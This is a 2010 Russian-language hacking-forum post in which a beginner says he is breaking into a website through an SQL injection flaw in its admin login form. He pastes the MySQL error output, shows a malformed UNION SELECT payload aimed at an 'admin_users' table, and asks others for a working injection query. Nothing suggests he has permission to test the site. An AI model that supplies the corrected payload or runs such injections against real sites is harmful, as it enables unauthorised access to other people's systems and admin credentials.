15.03.2010, 10:34
|
|
Познающий
Регистрация: 14.05.2009
Сообщений: 92
Провел на форуме:
299447
Репутация:
5
|
|
Всем доброго времени суток!
Помогите если не сложно.
Ломаю сайт не зная как 
Нашёл на сайте форму для входа админа, в ней есть баг.
Вот форма :
В поле e-mail ввожу ковычку вылетает такая ошибка:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''' AND PASSWORD =''
В поле E-mail пишу следующее:
'union+select+from+admin_users+limit+19,1%23
Вылетает это:
1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '+select+from+admin_users+limit+19,1%23' AND PASSWORD =''' at line 1 SELECT * FROM admin_users WHERE USERNAME=''union+select+from+admin_users+limit+19, 1%23' AND PASSWORD =''
В чём моя ошибка? Сильно не пинайте если натупил =)
Я только учусь)
и если не сложно дайте код правильного запроса.
Заранее спасибо ! =) |
|
|